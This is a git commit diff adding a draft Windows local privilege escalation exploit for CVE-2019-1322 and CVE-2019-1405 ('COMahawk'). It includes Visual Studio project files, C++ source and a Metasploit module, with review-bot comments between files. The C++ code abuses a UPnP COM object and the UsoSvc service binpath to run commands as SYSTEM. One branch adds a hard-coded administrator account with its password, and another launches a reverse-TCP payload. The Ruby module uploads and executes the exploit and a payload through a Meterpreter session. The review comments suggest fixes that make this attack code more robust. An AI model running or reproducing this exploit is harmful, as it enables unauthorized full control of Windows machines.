First draft of windows comahawk priv esc
parent
104710ca41
commit
8a9dd35793
Binary file not shown.
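--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.sln
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-1322-EXE", "CVE-2019-1322-EXE.vcxproj", "{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|Win32 = Debug|Win32
+Release|Win32 = Release|Win32
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.ActiveCfg = Debug|x64
+{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.Build.0 = Debug|x64
+{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.ActiveCfg = Release|x64
+{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.Build.0 = Release|x64
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+EndGlobal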
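--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj
@@ -0,0 +1,149 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Debug|x64">
+<Configuration>Debug</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
+<Keyword>Win32Proj</Keyword>
+<RootNamespace>CVE20191322EXE</RootNamespace>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<ClCompile>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+</Link>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClCompile Include="cve-2019-1322.cpp" />
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+</ImportGroup>
+</Project>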
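--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj.filters
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj.filters
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup>
+<Filter Include="Source Files">
+<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+</Filter>
+<Filter Include="Header Files">
+<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+</Filter>
+<Filter Include="Resource Files">
+<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+</Filter>
+</ItemGroup>
+<ItemGroup>
+<ClCompile Include="cve-2019-1322.cpp">
+<Filter>Source Files</Filter>
+</ClCompile>
+</ItemGroup>
+</Project>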
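--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
@@ -0,0 +1,108 @@
+#include <iostream> #REMOVE BEFORE RELEASE
+#include <atlbase.h> // CComPtr
+#include <Propvarutil.h>
+#include <string>
+#import "wshom.ocx" no_namespace, raw_interfaces_only // Error here is a bug. It will still compile
+
+# define command_size 50
+const GUID guidObject = { 0x6d8ff8e7, 0x730d, 0x11d4, { 0xbf, 0x42, 0x00, 0xb0, 0xd0, 0x11, 0x8b, 0x56 } };
+
+struct __declspec(uuid("6d8ff8d4-730d-11d4-bf42-00b0d0118b56"))
+IUPnPContainerManager : public IUnknown {
+virtual HRESULT __stdcall ReferenceContainer(wchar_t*) = 0;
+virtual HRESULT __stdcall UnReferenceContainer(wchar_t*) = 0;
+virtual HRESULT __stdcall CreateInstance(
+wchar_t* string1,
+GUID* guid1,
+GUID* guid2,
+IUnknown** pObject) = 0;
+virtual HRESULT __stdcall CreateInstanceWithProgID(
+wchar_t* string1,
+wchar_t* guid1,
+GUID* guid2,
+IUnknown** pObject) = 0;
+virtual HRESULT __stdcall Shutdown() = 0;
+
+};
+
+int wmain(int argc, wchar_t* argv[], wchar_t* envp[])
+{
+wchar_t command[command_size];
+
+wprintf(L"This is a test\n");
+wprintf(L"This is a test %s\n", argv[1]);
+CoInitialize(NULL);
+
+HRESULT hr1, hr2 = 0, hr3 = 0, hr4 = 0;
+
+IUPnPContainerManager* ContainerMgr;
+
+hr1 = CoCreateInstance(guidObject, nullptr, CLSCTX_ALL, IID_PPV_ARGS(&ContainerMgr));
+
+hr2 = ContainerMgr->ReferenceContainer((wchar_t*)L"apt69");
+
+CLSID clsid;
+
+CLSIDFromProgID(OLESTR("WScript.Shell"), &clsid);
+
+IWshShell* WshInterface = nullptr;
+
+auto ShellUUID = __uuidof(IWshShell);
+
+hr3 = ContainerMgr->CreateInstance((wchar_t*)L"apt69", &clsid, &ShellUUID, (IUnknown**)&WshInterface);
+
+int out;
+VARIANT s;
+InitVariantFromInt32(1, &s);
+VARIANT type;
+InitVariantFromBoolean(TRUE, &type);
+
+if (argc > 1)
+{
+const wchar_t* msg[6] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c ", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
+
+// const wchar_t* command = (std::wstring(msg[1]) + std::wstring(argv[1]) + std::wstring(L" &\"")).data();
+memset((void*) command, 0, command_size * sizeof(wchar_t));
+wsprintf(command, L"%s%s &\"", msg[1], argv[1]);
+
+wprintf(L"command = %s\n", command);
+
+printf("[\\] Progress: ");
+for (int i = 0; i < 6; i++)
+{
+if (i == 1)
+{
+wprintf(command);
+hr4 = WshInterface->Run(::SysAllocString(command), &s, &type, &out);
+}
+else
+{
+hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
+wprintf(msg[i]);
+}
+Sleep(3000);
+printf(" %d/6", i + 1);
+}
+
+printf("\n[+] Command executed.");
+}
+else
+{
+//const wchar_t* msg[9] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net user /add Tomahawk RibSt3ak69 &\"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net localgroup administrators /add Tomahawk & \"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
+const wchar_t* msg[9] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\Users\\msfuser\\Desktop\\revtcpx64.exe &\"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net localgroup administrators /add Tomahawk & \"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
+
+printf("[\\] Progress: ");
+for (int i = 0; i < 9; i++)
+{
+hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
+Sleep(3000);
+printf(" %d/9", i + 1);
+}
+
+printf("\n[+] Hopefully Tomahawk:RibSt3ak69 is added as an admin.\n");
+}
+
+CoUninitialize();
+
+return 0;
+}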
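Review bot: In `wmain`, `wsprintf(command, L"%s%s &\"", msg[1], argv[1])` formats into `wchar_t command[command_size]` with `command_size` set to 50, and by my count the fixed prefix and suffix already take 41 of those slots, so a caller-supplied argument longer than about eight characters writes past the end of the stack buffer. `<string>` is already included, so `std::wstring command = std::wstring(msg[1]) + argv[1] + L" &\"";` with `command.c_str()` at the uses removes the fixed buffer, and `wprintf(command)` should become `wprintf(L"%s", command.c_str())` so the argument is never read as a format string. None of `hr1` to `hr4` is checked, so a failed `CoCreateInstance` leaves `ContainerMgr` uninitialised when `ReferenceContainer` is called through it, and a failed `CreateInstance` leaves `WshInterface` null at `Run`. The no-argument branch still carries a developer-specific path under `C:\Users\msfuser\Desktop` and a hard-coded account name and password, and the first include has trailing `#REMOVE BEFORE RELEASE` text that is not a C++ comment; both should go before this leaves draft.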
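--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/~AutoRecover.CVE-2019-1322-EXE.vcxproj
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/~AutoRecover.CVE-2019-1322-EXE.vcxproj
@@ -0,0 +1,84 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
+<Keyword>Win32Proj</Keyword>
+<RootNamespace>CVE20191322EXE</RootNamespace>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+</Link>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClCompile Include="cve-2019-1322.cpp" />
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+</ImportGroup>
+</Project>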
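Review bot: `~AutoRecover.CVE-2019-1322-EXE.vcxproj` looks like an IDE auto-recovery copy of the project file rather than a source file: it repeats the `ProjectGuid` of `CVE-2019-1322-EXE.vcxproj` but carries only the Win32 configurations. It should be dropped from the commit, and the `~AutoRecover.*` pattern added to the ignore list so editor backups do not land under `external/source`.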
|
@ -0,0 +1,199 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/post/common'
|
||||
require 'msf/core/post/file'
|
||||
require 'msf/core/post/windows/priv'
|
||||
require 'msf/core/post/windows/registry'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
|
||||
'Description' => %q(
|
||||
THis exploit uses two ulnerabilities to execute a command as an elevated user.
|
||||
The first uses the UPnP service to execute as a LOCAL SERVICE user and the
|
||||
second abuses a misconficuration to allow execution of LOCAL SERVICE accounts
|
||||
to run as system.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)
|
||||
'hoangprod', # PoC
|
||||
'bwatters-r7' # msf module
|
||||
],
|
||||
'Platform' => ['win'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows x64', { 'Arch' => ARCH_X64 }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 12 2019',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2019-1322'],
|
||||
['CVE', '2019-1405'],
|
||||
['EDB', '47684'],
|
||||
['URL', 'https://github.com/apt69/COMahawk'],
|
||||
['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
|
||||
['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DisablePayloadHandler' => 'False'
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('EXPLOIT_NAME',
|
||||
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
|
||||
OptString.new('PAYLOAD_NAME',
|
||||
[false, 'The filename for the payload to be used on the target host if (%RAND%.exe by default).', nil]),
|
||||
OptString.new('PATH',
|
||||
[false, 'Path to write binaries if (%TEMP% by default).', nil]),
|
||||
OptInt.new('EXECUTE_DELAY',
|
||||
[false, 'The number of seconds to delay before executing the exploit', 3])
|
||||
])
|
||||
end
|
||||
|
||||
def setup
|
||||
super
|
||||
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
|
||||
@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
|
||||
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
|
||||
@payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
|
||||
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
|
||||
@payload_path = "#{temp_path}\\#{payload_name}"
|
||||
@exploit_path = "#{temp_path}\\#{exploit_name}"
|
||||
@payload_exe = generate_payload_exe
|
||||
end
|
||||
|
||||
def validate_active_host
|
||||
begin
|
||||
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
raise Msf::Exploit::Failed, 'Could not connect to session'
|
||||
end
|
||||
end
|
||||
|
||||
def validate_remote_path(path)
|
||||
unless directory?(path)
|
||||
fail_with(Failure::Unreachable, "#{path} does not exist on the target")
|
||||
end
|
||||
end
|
||||
|
||||
def validate_target
|
||||
#
|
||||
# This needs to be better
|
||||
#
|
||||
if sysinfo['Architecture'] == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
|
||||
end
|
||||
if sysinfo['OS'] =~ /XP/
|
||||
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
|
||||
end
|
||||
end
|
||||
|
||||
def ensure_clean_destination(path)
|
||||
if file?(path)
|
||||
print_status("#{path} already exists on the target. Deleting...")
|
||||
begin
|
||||
file_rm(path)
|
||||
print_status("Deleted #{path}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error("Unable to delete #{path}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def ensure_clean_exploit_destination
|
||||
ensure_clean_destination(exploit_path)
|
||||
end
|
||||
|
||||
def ensure_clean_payload_destination
|
||||
ensure_clean_destination(payload_path)
|
||||
end
|
||||
|
||||
def upload_exploit
|
||||
local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2019-1322', 'CVE-2019-1322-EXE.exe')
|
||||
upload_file(exploit_path, local_exploit_path)
|
||||
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
|
||||
end
|
||||
|
||||
def upload_payload
|
||||
write_file(payload_path, payload_exe)
|
||||
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
|
||||
end
|
||||
|
||||
def execute_exploit
|
||||
sleep(datastore['EXECUTE_DELAY'])
|
||||
print_status("Running exploit #{exploit_path} with payload #{payload_path}")
|
||||
begin
|
||||
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
|
||||
rescue Rex::TimeoutError => e
|
||||
vprint_status("This is normal.... needs to be fixed....")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit_dll
|
||||
begin
|
||||
print_status('Checking target...')
|
||||
validate_active_host
|
||||
validate_target
|
||||
print_status('Target Looks Good... trying to start notepad')
|
||||
process = setup_process
|
||||
inject_magic(process)
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error(e.message)
|
||||
end
|
||||
end
|
||||
|
||||
def exploit_exe
|
||||
begin
|
||||
validate_remote_path(temp_path)
|
||||
ensure_clean_exploit_destination
|
||||
ensure_clean_payload_destination
|
||||
upload_exploit
|
||||
upload_payload
|
||||
execute_exploit
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error(e.message)
|
||||
ensure_clean_exploit_destination
|
||||
ensure_clean_payload_destination
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
begin
|
||||
validate_active_host
|
||||
validate_target
|
||||
exploit_exe
|
||||
end
|
||||
end
|
||||
|
||||
attr_reader :exploit_name
|
||||
attr_reader :payload_name
|
||||
attr_reader :payload_exe
|
||||
attr_reader :temp_path
|
||||
attr_reader :payload_path
|
||||
attr_reader :exploit_path
|
||||
end
|
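Review bot: `exploit_dll` calls `setup_process` and `inject_magic`, neither of which is defined in this file, and nothing calls `exploit_dll` itself because `exploit` goes straight to `exploit_exe`. The method and the `include Msf::Post::Windows::ReflectiveDLLInjection` line look like template leftovers and should be removed, unless those helpers are meant to come from a mixin not visible here. In `execute_exploit` the `rescue Rex::TimeoutError => e` branch discards the exception behind the placeholder message `This is normal.... needs to be fixed....`, and `output` is assigned but never read; either log the timeout with `elog` as the other rescue blocks do, or document why it is expected. The `'Description'` text has typos (`THis`, `ulnerabilities`, `misconficuration`), and the suffix checks in `setup` use `/\.exe$/i` where `/\.exe\z/i` would anchor at the end of the string rather than at a line end. `validate_target` still carries the `This needs to be better` comment and only rejects x86 and XP, so a `check` method or a build/patch-level test is worth adding before the module is ranked `ExcellentRanking`.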